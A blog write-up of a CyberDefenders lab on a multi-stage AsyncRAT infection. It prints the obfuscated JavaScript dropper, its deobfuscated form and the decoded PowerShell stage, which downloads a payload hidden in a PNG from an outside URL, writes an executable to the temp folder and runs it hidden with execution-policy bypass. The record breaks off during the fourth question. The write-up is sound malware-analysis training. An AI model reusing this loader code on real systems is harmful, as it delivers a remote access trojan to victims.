Bernardo's Blog

CyberDefenders - AsyncRAT

This lab aims to equip learners with practical skills in malware analysis by dissecting a multi-stage AsyncRAT infection. Participants will explore obfuscation techniques, payload extraction, persistence mechanisms, and steganographic methods used in real-world malware, enhancing their ability to detect, analyze, and respond to complex cyber threats.

Intro Text

You are a cybersecurity analyst at Globex Corp. A concerning report has come in: an employee opened an email with an attachment claiming to be an order specification, which actually harbored a JavaScript file designed to deploy AsyncRAT. This malware evades detection with alarming efficiency. To secure Globex's network and data, you must analyze the attachment, reverse-engineer the AsyncRAT’s obfuscation techniques, and determine the scope of AsyncRAT's infiltration.

alt text

Link to lab: https://cyberdefenders.org/blueteam-ctf-challenges/asyncrat/

Questions

  1. In the process of dissecting the AsyncRAT payload, you discover a variable in the PowerShell script shrouded in complexity. What is the name of this variable that conceals the malicious obfuscated code?

    The code we are given is clearly obfuscated, so we need to run it through some de-obfuscation tools.

    Original code:

    var _0x2ed357 = _0x55e1;
(function (_0x4fbbdd, _0x38b324) {
    var _0x1efc0 = _0x55e1;
    var _0x3c7ba1 = _0x4fbbdd();
    while (!![]) {
        try {
            var _0x170c96 = parseInt(_0x1efc0(0x12f)) / 0x1 + parseInt(_0x1efc0(0x12a)) / 0x2 + -parseInt(_0x1efc0(0x11e)) / 0x3 * (-parseInt(_0x1efc0(0x11b)) / 0x4) + -parseInt(_0x1efc0(0x123)) / 0x5 * (-parseInt(_0x1efc0(0x131)) / 0x6) + parseInt(_0x1efc0(0x134)) / 0x7 + -parseInt(_0x1efc0(0x11c)) / 0x8 * (-parseInt(_0x1efc0(0x132)) / 0x9) + -parseInt(_0x1efc0(0x11d)) / 0xa * (parseInt(_0x1efc0(0x130)) / 0xb);
            if (_0x170c96 === _0x38b324) {
                break;
            } else {
                _0x3c7ba1['push'](_0x3c7ba1['shift']());
            }
        } catch (_0x2f32f5) {
            _0x3c7ba1['push'](_0x3c7ba1['shift']());
        }
    }
}(_0x2053, 0xa1738));
var gQBnV = ![];
function PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x5d58a2) {
    var _0x58d92c = _0x55e1;
    return _0x5d58a2[_0x58d92c(0x133)]('')[_0x58d92c(0x135)]()[_0x58d92c(0x129)]('');
}
var olffySApjnmNzEVCrHdsmIvkvtrmdvjBfknvClSyBGJHuqChGtDdwNjUtRxkkyfJOYUiJGZMAThKDTsUxGJuaNqSbTPvTbbqmefDGsXrinQyOMnXQfeSjWxgZKFIubTWXJNqCxTJwTRbGDBclyLnPEmbnFRmJCPDQxEhyrMtITkhfcVQBxcMaJXujuQBrVucxLrEASLY = PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x12c));
var hanqbbYcWLzDlNxOPncjvQCBQonxVECthpIBwsmoBBvosDsujcOzxzaSUiwwkpZHunsTFbSwqYqacScohDNICrUwvjkGulSfZZmeTtftPaPdvKsQTJQISdssGpxQIUGuxwhWPmoCMGohuYLXDyTwcGOtBtKBHZMXyOJlkQOEhkiqLvzhicJrDPknYXzFTodoezdLgRHq = PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI('\x27\x20=\x20ogidoC$') + olffySApjnmNzEVCrHdsmIvkvtrmdvjBfknvCl$Codigo = 'JGltYWdlVXJsID0gJ2h0dHBzOi8vZ2Nk♛♚mIucGJyZC5j♛♚y9p♛♚WFnZXMvcllzcHhrelQzSzZrLnBuZyc7JHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJD♛♚Gll♛♚nQ7JGltYWdlQnl0ZXMgPSAkd2ViQ2xpZW50LkRvd25s♛♚2FkRGF0YSgkaW1hZ2VVcmwpOyRp♛♚WFnZVRleHQgPSB♛♚U3lzdGVtLlRleHQuRW5j♛♚2Rp♛♚mddOjpVVEY4LkdldFN0cmluZygkaW1hZ2VCeXRlcyk7JHN0YXJ0RmxhZyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7JHN0YXJ0SW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJHN0YXJ0RmxhZyk7JGVuZEluZGV4ID0gJGltYWdlVGV4dC5J♛♚mRleE9mKCRl♛♚mRG♛♚GFnKTskc3RhcnRJ♛♚mRleCAtZ2UgMCAtYW5kICRl♛♚mRJ♛♚mRleCAtZ3QgJHN0YXJ0SW5kZXg7JHN0YXJ0SW5kZXggKz0gJHN0YXJ0RmxhZy5MZW5ndGg7JGJhc2U2NExl♛♚md0aCA9ICRl♛♚mRJ♛♚mRleCAtICRzdGFydEluZGV4OyRiYXNlNjRD♛♚21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJp♛♚mcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpLlRvQ2hhckFycmF5KCk7W2FycmF5XTo6UmV2ZXJzZSgkYmFzZTY0Q29t♛♚WFuZCk7JGJhc2U2NENv♛♚W1h♛♚mQ9LWpvaW4gJGJhc2U2NENv♛♚W1h♛♚mQ7JGNv♛♚W1h♛♚mRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZy♛♚21CYXNlNjRTdHJp♛♚mcoJGJhc2U2NENv♛♚W1h♛♚mQpOyR0ZW1wRXhlUGF0aCA9IFtTeXN0ZW0uSU8uUGF0aF06OkdldFRl♛♚XBQYXRoKCkgKyB♛♚U3lzdGVtLkd1aWRdOjpOZXdHdWlkKCkuVG9TdHJp♛♚mcoKSArICIuZXhlIjt♛♚U3lzdGVtLklPLkZp♛♚GVdOjpXcml0ZUFs♛♚EJ5dGVzKCR0ZW1wRXhlUGF0aCwgJGNv♛♚W1h♛♚mRCeXRlcyk7cG93ZXJzaGVs♛♚C5leGUgLXdp♛♚mRvd3N0eWxlIGhpZGRl♛♚iAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtTm9Qcm9maWxlIC1j♛♚21tYW5kICR0ZW1wRXhlUGF0aA==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','b') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd
SyBGJHuqChGtDdwNjUtRxkkyfJOYUiJGZMAThKDTsUxGJuaNqSbTPvTbbqmefDGsXrinQyOMnXQfeSjWxgZKFIubTWXJNqCxTJwTRbGDBclyLnPEmbnFRmJCPDQxEhyrMtITkhfcVQBxcMaJXujuQBrVucxLrEASLY + '\x27;' + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x124)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x127)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x12e)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x12b)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x12d)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI('6esaBmorF::]trevno') + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x126)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x125)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x121)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x11f)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x2ed357(0x128)) + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI('moc-\x20eliforPo') + PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI('dxujWO$\x20dnam');
var eDiSkbNqurqMJDuUiMjNdhOPQQQBvgCftSEHiubYOGUaguzUTNMYeXrTtQOfKyfoAYstCerExYstbTlKouLwhYrnRQphSSARgdjkjrVfvyUZpnHZUSKwsqxMwNFXqElpakdDRQTBboYYHlOHdpQuaUtcDulXphSoyytwUdssTCfGwUoaWBxOUbiVhnwlqCxQURynpcjj = _0x2ed357(0x122);
var ESlFnRWpugflXfvZqSyJlkwsMpcbzCAvFjVaLHGmHCPVjVevdKGGqImgXdntYCyHpCJZWNwKzrUiJEdtUbSUwZDEcrUscveYRSCVwMyIGRzKcZGjcknRtkmrhtoHYyjrUqVpSuBjUVbcmXfLCWiAdbpEMwWATsqxmdxuDKODAfEFiwTDSExHzcsrUPrmOKWPyRGNlldF = new ActiveXObject(eDiSkbNqurqMJDuUiMjNdhOPQQQBvgCftSEHiubYOGUaguzUTNMYeXrTtQOfKyfoAYstCerExYstbTlKouLwhYrnRQphSSARgdjkjrVfvyUZpnHZUSKwsqxMwNFXqElpakdDRQTBboYYHlOHdpQuaUtcDulXphSoyytwUdssTCfGwUoaWBxOUbiVhnwlqCxQURynpcjj);
ESlFnRWpugflXfvZqSyJlkwsMpcbzCAvFjVaLHGmHCPVjVevdKGGqImgXdntYCyHpCJZWNwKzrUiJEdtUbSUwZDEcrUscveYRSCVwMyIGRzKcZGjcknRtkmrhtoHYyjrUqVpSuBjUVbcmXfLCWiAdbpEMwWATsqxmdxuDKODAfEFiwTDSExHzcsrUPrmOKWPyRGNlldF[_0x2ed357(0x120)](_0x2ed357(0x11a) + hanqbbYcWLzDlNxOPncjvQCBQonxVECthpIBwsmoBBvosDsujcOzxzaSUiwwkpZHunsTFbSwqYqacScohDNICrUwvjkGulSfZZmeTtftPaPdvKsQTJQISdssGpxQIUGuxwhWPmoCMGohuYLXDyTwcGOtBtKBHZMXyOJlkQOEhkiqLvzhicJrDPknYXzFTodoezdLgRHq + '\x22', 0x0, ![]);
function _0x55e1(_0x2fba78, _0x26ef0b) {
    var _0x205308 = _0x2053();
    _0x55e1 = function (_0x55e126, _0x45c24a) {
        _0x55e126 = _0x55e126 - 0x11a;
        var _0x157235 = _0x205308[_0x55e126];
        return _0x157235;
    };
    return _0x55e1(_0x2fba78, _0x26ef0b);
}
function _0x2053() {
    var _0x2ba7ce = [
        'S[\x20=\x20dxujWO$',
        ';))\x20)\x27b\x27,\x27♚♛\x27(eca',
        'lper.ogidoc$(gnirtS4',
        'eT.metsy',
        'N-\x20ssapyb\x20ycilopnoituc',
        'join',
        '1025078vdqKYY',
        'eG.edoci',
        '==Aa0FGUlhXRw1WZ0RCIk5WYt12♚♛j1CIlxWam9mcQ9mTtAyczFGc5JGI5NWas9Gcu9Wa0V3YlhXZtAi♚♛lRGZphGIlxWe0N3dvRm♚♛pdXLgUGel5C♚♛sVGazJXZ39Gc7kyclRXeCRm♚♛h1W♚♛vNGJgwCa0FGUlhXRw1WZ0RCKzVGd5JE♚♛sFUZ0lmcXpjOdVG♚♛pZkLPlkLtVGdzl3U♚♛tjIlhXZuICIrASKocm♚♛pJHdT9GVukCKklWdHdXZOpjOdRWa1dkLtVGdzl3U♚♛ByKgkCKoRXYQBX♚♛lRFdldkO60Fa0FGUu8USu0WZ0NXeTtFI9ACa0FGUlhXRw1WZ0RyOpQm♚♛h1W♚♛vNEN2U2chJGJocm♚♛pJHdTRjNlNXYC12♚♛yZkO60FdyVmdu92Qu0WZ0NXeTtFI9AyclRXeCRm♚♛h1W♚♛vNGJ7Qm♚♛h1W♚♛vNEN2U2chJGJg4WavpWL9Qm♚♛h1W♚♛vNEN2U2chJGJ7kCZuFW♚♛t92Q0YTZzFmYkgSZzJXZ2VmU6oTX5FmcyF2W7kCK5FmcyFkchh2QvRlLpgGdn5WZMRjNlNXYiRCIsgXZk5WS0JXY0NHJocm♚♛pJHdzJWdT5Cd4VGVldWYtlGJg0DIk5WYt12♚♛DRjNlNXYiRyO4VGZulEdyFGdzRCItACelRm♚♛JRm♚♛lRCI9ACa0dm♚♛lxEN2U2chJGJ7gGdn5WZM5yZhxmR0JXY0NHJg0zKggXZk5WS0JXY0NHJ7gXZk5WS0JXY0NHJgQ3ZtACelRm♚♛JRm♚♛lRCIk5WYtACMgU2ZtACelRm♚♛JRnchR3cksTKnFG♚♛GRm♚♛lRCKm9EelRm♚♛J5Cd4VGVldWYtlGJg0DI4VGZulEZuVGJ7kyZhxmR0JXY0NHJoY2T4VGZulkL0hXZUV2Zh1WakASPggXZk5WS0JXY0NHJ7ciP+QkTF9FN2U0UBJEP8cCI9AyZhxmRk5WZkszJ+4DVSFEVT9FN2U0UBJEP8cCI9AyZhxmR0JXY0NHJ7kyclRXeCV2Zh1WakgyZulmc0NFdldkL4YEVVpjOddm♚♛pR2♚♛j5WRuQHelRlLtVGdzl3U♚♛BSPgQHelRVZnFW♚♛pRyOpwmcVV2Zh1WakgSY0FGRkF2♚♛s52dvRkL05WZpx2QiV2dkASPgMXZ0lnQldWYtlGJ7Qn♚♛llG♚♛DJWZX5Cdl5kLtVGdzl3UgQ3YlpmYP1ydl5EI9ACduVWasNkYldHJ7cyZuBnLrZzSzQlerhHczllcvMXZnFW♚♛p9y♚♛j5CZyJGcuIm♚♛kN2Zv8iOzBHd0h2Jg0DIsJXVldWYtlGJ',
        'C.metsyS[(gnirtSt',
        'nU::]gnidocnE.tx',
        '1300151dRQMiR',
        '11SZefHC',
        '6irkekm',
        '488718KfgGNI',
        'split',
        '3218285wvujoz',
        'reverse',
        'powershell\x20-command\x20\x22',
        '4AOQQVR',
        '136SVlYwa',
        '32526170qzGCNq',
        '374217EdqpjF',
        'exe-\x20neddih\x20elytswod',
        'Run',
        'niw-\x20exe.llehsrewop',
        'WScript.Shell',
        '2968015qdSJdF'
    ];
    _0x2053 = function () {
        return _0x2ba7ce;
    };
    return _0x2053();
}

    Running it through a deobfuscator, we get:

    function PPGnIJfdSdJwnbhDmJOmPsHixFAUqYszDllXfNfgjBvoLlUjSGGClBwLWEMMGNpFQYhoJOugHPuOyfuGziEuOWLmcMWmyWNfYqfdoCgGMvwCJltPxiflBrKgywudmPLWXTYXcoJboaQdSKXTzmBswwBNcVdmARyaXbfmbDtfxzfTCFeQWgAnOQtnHPWVxrQnvVspDhKI(_0x5d58a2) {
return _0x5d58a2.split('').reverse().join('');
}
var olffySApjnmNzEVCrHdsmIvkvtrmdvjBfknvClSyBGJHuqChGtDdwNjUtRxkkyfJOYUiJGZMAThKDTsUxGJuaNqSbTPvTbbqmefDGsXrinQyOMnXQfeSjWxgZKFIubTWXJNqCxTJwTRbGDBclyLnPEmbnFRmJCPDQxEhyrMtITkhfcVQBxcMaJXujuQBrVucxLrEASLY = "==Aa0FGUlhXRw1WZ0RCIk5WYt12♚♛j1CIlxWam9mcQ9mTtAyczFGc5JGI5NWas9Gcu9Wa0V3YlhXZtAi♚♛lRGZphGIlxWe0N3dvRm♚♛pdXLgUGel5C♚♛sVGazJXZ39Gc7kyclRXeCRm♚♛h1W♚♛vNGJgwCa0FGUlhXRw1WZ0RCKzVGd5JE♚♛sFUZ0lmcXpjOdVG♚♛pZkLPlkLtVGdzl3U♚♛tjIlhXZuICIrASKocm♚♛pJHdT9GVukCKklWdHdXZOpjOdRWa1dkLtVGdzl3U♚♛ByKgkCKoRXYQBX♚♛lRFdldkO60Fa0FGUu8USu0WZ0NXeTtFI9ACa0FGUlhXRw1WZ0RyOpQm♚♛h1W♚♛vNEN2U2chJGJocm♚♛pJHdTRjNlNXYC12♚♛yZkO60FdyVmdu92Qu0WZ0NXeTtFI9AyclRXeCRm♚♛h1W♚♛vNGJ7Qm♚♛h1W♚♛vNEN2U2chJGJg4WavpWL9Qm♚♛h1W♚♛vNEN2U2chJGJ7kCZuFW♚♛t92Q0YTZzFmYkgSZzJXZ2VmU6oTX5FmcyF2W7kCK5FmcyFkchh2QvRlLpgGdn5WZMRjNlNXYiRCIsgXZk5WS0JXY0NHJocm♚♛pJHdzJWdT5Cd4VGVldWYtlGJg0DIk5WYt12♚♛DRjNlNXYiRyO4VGZulEdyFGdzRCItACelRm♚♛JRm♚♛lRCI9ACa0dm♚♛lxEN2U2chJGJ7gGdn5WZM5yZhxmR0JXY0NHJg0zKggXZk5WS0JXY0NHJ7gXZk5WS0JXY0NHJgQ3ZtACelRm♚♛JRm♚♛lRCIk5WYtACMgU2ZtACelRm♚♛JRnchR3cksTKnFG♚♛GRm♚♛lRCKm9EelRm♚♛J5Cd4VGVldWYtlGJg0DI4VGZulEZuVGJ7kyZhxmR0JXY0NHJoY2T4VGZulkL0hXZUV2Zh1WakASPggXZk5WS0JXY0NHJ7ciP+QkTF9FN2U0UBJEP8cCI9AyZhxmRk5WZkszJ+4DVSFEVT9FN2U0UBJEP8cCI9AyZhxmR0JXY0NHJ7kyclRXeCV2Zh1WakgyZulmc0NFdldkL4YEVVpjOddm♚♛pR2♚♛j5WRuQHelRlLtVGdzl3U♚♛BSPgQHelRVZnFW♚♛pRyOpwmcVV2Zh1WakgSY0FGRkF2♚♛s52dvRkL05WZpx2QiV2dkASPgMXZ0lnQldWYtlGJ7Qn♚♛llG♚♛DJWZX5Cdl5kLtVGdzl3UgQ3YlpmYP1ydl5EI9ACduVWasNkYldHJ7cyZuBnLrZzSzQlerhHczllcvMXZnFW♚♛p9y♚♛j5CZyJGcuIm♚♛kN2Zv8iOzBHd0h2Jg0DIsJXVldWYtlGJ".split('').reverse().join('');
var hanqbbYcWLzDlNxOPncjvQCBQonxVECthpIBwsmoBBvosDsujcOzxzaSUiwwkpZHunsTFbSwqYqacScohDNICrUwvjkGulSfZZmeTtftPaPdvKsQTJQISdssGpxQIUGuxwhWPmoCMGohuYLXDyTwcGOtBtKBHZMXyOJlkQOEhkiqLvzhicJrDPknYXzFTodoezdLgRHq = "' = ogidoC$".split('').reverse().join('') + olffySApjnmNzEVCrHdsmIvkvtrmdvjBfknvClSyBGJHuqChGtDdwNjUtRxkkyfJOYUiJGZMAThKDTsUxGJuaNqSbTPvTbbqmefDGsXrinQyOMnXQfeSjWxgZKFIubTWXJNqCxTJwTRbGDBclyLnPEmbnFRmJCPDQxEhyrMtITkhfcVQBxcMaJXujuQBrVucxLrEASLY + "';" + "S[ = dxujWO$".split('').reverse().join('') + "eT.metsy".split('').reverse().join('') + "nU::]gnidocnE.tx".split('').reverse().join('') + "eG.edoci".split('').reverse().join('') + "C.metsyS[(gnirtSt".split('').reverse().join('') + '6esaBmorF::]trevno'.split('').reverse().join('') + "lper.ogidoc$(gnirtS4".split('').reverse().join('') + ";)) )'b','♚♛'(eca".split('').reverse().join('') + "niw- exe.llehsrewop".split('').reverse().join('') + "exe- neddih elytswod".split('').reverse().join('') + "N- ssapyb ycilopnoituc".split('').reverse().join('') + "moc- eliforPo".split('').reverse().join('') + "dxujWO$ dnam".split('').reverse().join('');
var ESlFnRWpugflXfvZqSyJlkwsMpcbzCAvFjVaLHGmHCPVjVevdKGGqImgXdntYCyHpCJZWNwKzrUiJEdtUbSUwZDEcrUscveYRSCVwMyIGRzKcZGjcknRtkmrhtoHYyjrUqVpSuBjUVbcmXfLCWiAdbpEMwWATsqxmdxuDKODAfEFiwTDSExHzcsrUPrmOKWPyRGNlldF = new ActiveXObject("WScript.Shell");
ESlFnRWpugflXfvZqSyJlkwsMpcbzCAvFjVaLHGmHCPVjVevdKGGqImgXdntYCyHpCJZWNwKzrUiJEdtUbSUwZDEcrUscveYRSCVwMyIGRzKcZGjcknRtkmrhtoHYyjrUqVpSuBjUVbcmXfLCWiAdbpEMwWATsqxmdxuDKODAfEFiwTDSExHzcsrUPrmOKWPyRGNlldF.Run("powershell -command \"" + hanqbbYcWLzDlNxOPncjvQCBQonxVECthpIBwsmoBBvosDsujcOzxzaSUiwwkpZHunsTFbSwqYqacScohDNICrUwvjkGulSfZZmeTtftPaPdvKsQTJQISdssGpxQIUGuxwhWPmoCMGohuYLXDyTwcGOtBtKBHZMXyOJlkQOEhkiqLvzhicJrDPknYXzFTodoezdLgRHq + "\"", 0x0, false);

    Looking at the code form an high level, we can see that the last variable is the one that tries to run code, so we can interpret the other variables in our browser, and get the deobfuscated, ready to run code:

    alt text

    $Codigo = 'JGltYWdlVXJsID0gJ2h0dHBzOi8vZ2Nk♛♚mIucGJyZC5j♛♚y9p♛♚WFnZXMvcllzcHhrelQzSzZrLnBuZyc7JHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJD♛♚Gll♛♚nQ7JGltYWdlQnl0ZXMgPSAkd2ViQ2xpZW50LkRvd25s♛♚2FkRGF0YSgkaW1hZ2VVcmwpOyRp♛♚WFnZVRleHQgPSB♛♚U3lzdGVtLlRleHQuRW5j♛♚2Rp♛♚mddOjpVVEY4LkdldFN0cmluZygkaW1hZ2VCeXRlcyk7JHN0YXJ0RmxhZyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7JHN0YXJ0SW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJHN0YXJ0RmxhZyk7JGVuZEluZGV4ID0gJGltYWdlVGV4dC5J♛♚mRleE9mKCRl♛♚mRG♛♚GFnKTskc3RhcnRJ♛♚mRleCAtZ2UgMCAtYW5kICRl♛♚mRJ♛♚mRleCAtZ3QgJHN0YXJ0SW5kZXg7JHN0YXJ0SW5kZXggKz0gJHN0YXJ0RmxhZy5MZW5ndGg7JGJhc2U2NExl♛♚md0aCA9ICRl♛♚mRJ♛♚mRleCAtICRzdGFydEluZGV4OyRiYXNlNjRD♛♚21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJp♛♚mcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpLlRvQ2hhckFycmF5KCk7W2FycmF5XTo6UmV2ZXJzZSgkYmFzZTY0Q29t♛♚WFuZCk7JGJhc2U2NENv♛♚W1h♛♚mQ9LWpvaW4gJGJhc2U2NENv♛♚W1h♛♚mQ7JGNv♛♚W1h♛♚mRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZy♛♚21CYXNlNjRTdHJp♛♚mcoJGJhc2U2NENv♛♚W1h♛♚mQpOyR0ZW1wRXhlUGF0aCA9IFtTeXN0ZW0uSU8uUGF0aF06OkdldFRl♛♚XBQYXRoKCkgKyB♛♚U3lzdGVtLkd1aWRdOjpOZXdHdWlkKCkuVG9TdHJp♛♚mcoKSArICIuZXhlIjt♛♚U3lzdGVtLklPLkZp♛♚GVdOjpXcml0ZUFs♛♚EJ5dGVzKCR0ZW1wRXhlUGF0aCwgJGNv♛♚W1h♛♚mRCeXRlcyk7cG93ZXJzaGVs♛♚C5leGUgLXdp♛♚mRvd3N0eWxlIGhpZGRl♛♚iAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtTm9Qcm9maWxlIC1j♛♚21tYW5kICR0ZW1wRXhlUGF0aA==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','b') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd

    From this code, we can figure out that $Codigo is the variable obfuscating the code.

  2. As you trace the AsyncRAT’s steps, you come across a pivotal moment where it reaches out to the internet, fetching the next phase of its invasion. Identify the URL used to download the second stage of this malicious campaign.

    Looking into the code from the last question, we can see that powershell is executing the large string after replacing the special characters and decoding from base64. This is a common thing that is done by attackers to bypass AVs and and to get around encoding errors. Loading it into cyberchef we can get it decoded and easy to analyze.

    $imageUrl = 'https://gcdnb.pbrd.co/images/rYspxkzT3K6k.png';
$webClient = New-Object System.Net.WebClient;
$imageBytes = $webClient.DownloadData($imageUrl);
$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>';
$startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag);
$startIndex -ge 0 -and $endIndex -gt $startIndex;
$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;
$base64Command = $imageText.Substring($startIndex, $base64Length).ToCharArray();
[array]::Reverse($base64Command);
$base64Command=-join $base64Command;
$commandBytes = [System.Convert]::FromBase64String($base64Command);
$tempExePath = [System.IO.Path]::GetTempPath() + [System.Guid]::NewGuid().ToString() + ".exe";
[System.IO.File]::WriteAllBytes($tempExePath, $commandBytes);
powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $tempExePath

    The url is right there at the top of the code: https://gcdnb.pbrd.co/images/rYspxkzT3K6k.png.

  3. Within the chaos of encoded data retrieved during your investigation, there's a string that signals the beginning of the encoded code. What is this marker indicating where the encoded treasure lies within the downloaded file?

    Looking into the code from the last question, we can see that <<BASE64_START>> is the marker.

  4. The second stage of AsyncRAT has been meticulously unpacked, revealing an extracted Portable Executable (PE). To understand this stage's uniqueness, what is the MD5 hash of this extracted PE?

    Because the original link is dead, I used the file stored in the VM.

        $imageBytes = [System.IO.File]::ReadAllBytes("C:\Users\Administrator\Desktop\Start Here\Artifacts\rYspxkzT3K6k.png");
